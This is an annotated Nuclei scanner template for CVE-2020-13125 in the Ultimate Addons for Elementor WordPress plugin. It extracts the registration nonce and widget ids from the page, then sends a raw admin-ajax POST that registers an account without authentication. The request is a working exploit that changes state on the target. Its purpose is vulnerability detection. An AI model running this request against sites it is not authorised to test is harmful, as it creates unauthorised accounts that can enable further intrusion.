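# Nuclei template for CVE-2020-13125 (Ultimate Addons for Elementor registration bypass).
#
# How it works, as visible in this file:
#   1. Request 1 fetches the base URL and extracts the registration form nonce,
#      the post id and every registration-widget id from the page body.
#   2. The flow script repeats request 2 once per extracted widget id.
#   3. Request 2 submits a registration to admin-ajax.php; a JSON 200 response
#      containing "successfully registered" is reported as a finding.
#
# Operational caveat: this is a state-changing check. A positive result means
# the registration request was accepted, so a randomly named account is
# presumably left behind on the target and should be removed afterwards.
# The template is therefore tagged `intrusive` so it can be excluded with
# tag filtering (e.g. -exclude-tags) during non-invasive scans.

id: CVE-2020-13125

info:
  name: Ultimate Addons for Elementor <= 1.24.1 - Registration Bypass
  author: daffainfo
  severity: high
  description: |
    An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.
  impact: |
    Unauthenticated attackers can create user accounts with Subscriber role, potentially leading to further malicious activities or privilege escalation
  remediation: |
    Update to version 1.24.2 or later.
  reference:
    - https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13125
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2020-13125
    epss-score: 0.06554
    epss-percentile: 0.91384
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:brainstormforce:ultimate_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    # NOTE(review): request 2 runs once per extracted widget id, so pages with
    # several registration widgets will exceed this count; confirm how the
    # project wants max-request stated for flow loops.
    max-request: 2
    vendor: brainstormforce
    product: ultimate_addons_for_elementor
    framework: wordpress
  # `intrusive` added: request 2 creates an account on the target.
  tags: cve2020,cve,wp,wordpress,wp-plugin,brainstormforce,ultimate-addons-for-elementor,vkev,intrusive

# Run the discovery request first, then one registration attempt per widget id
# captured by the `widgets_id` extractor.
flow: |
  http(1)
  for (let widget_id of iterate(template.widgets_id)) {
    set("widget_id", widget_id)
    http(2)
  }

# Random per-run values for the test account.
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"
  # NOTE(review): a random 5-character .com domain may belong to a real third
  # party; if the plugin accepts it, a reserved test domain would avoid any
  # chance of mail reaching an unrelated recipient. Verify before changing.
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  # Request 1: passive discovery of the registration form and its parameters.
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2

    # Internal gate: continue only when the page exposes the registration
    # widget configuration. Internal matchers are not reported as findings.
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "uaelRegistration", "form_nonce")'
        condition: and
        internal: true

    extractors:
      # Nonce embedded in the page's JSON configuration.
      - type: regex
        name: form_nonce
        part: body
        group: 1
        regex:
          - ',"form_nonce":"([a-f0-9]+)"'
        internal: true

      # Numeric id of the page hosting the form.
      - type: regex
        name: post_id
        part: body
        group: 1
        regex:
          - '"post":{"id":([0-9]+),'
        internal: true

      # Every registration-form widget id on the page; iterated by `flow`.
      - type: regex
        name: widgets_id
        part: body
        group: 1
        regex:
          - 'elementor-widget-uael-registration-form" data-id="([a-f0-9]+)"'
        internal: true

  # Request 2: state-changing registration attempt using the extracted values.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=uael_register_user&nonce={{form_nonce}}&data[page_id]={{post_id}}&data[widget_id]={{widget_id}}&data[user_name]={{username}}&data[email]={{email}}&data[password]={{password}}&data[first_name]={{firstname}}&data[last_name]={{lastname}}&data[send_email]={{randstr}}&data[auto_login]=yes

    # All three conditions must hold: success text, JSON content type, HTTP 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'successfully registered'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# NOTE(review): the digest below is carried over unchanged from the original
# text; it presumably no longer verifies once the template is edited, so
# re-sign before distributing. Confirm against the project's signing process.
# digest: 490a00463044022035d304b2a3e8c9b6627d4aa362076d686b8aa2aa3f42c1ca305fb9729324779b0220117e0689ee1df1298e048ace429c7bc8bf6df29dac7c0724c474a6aa8007a1b2:922c64590222798bb761d5b6d8e72950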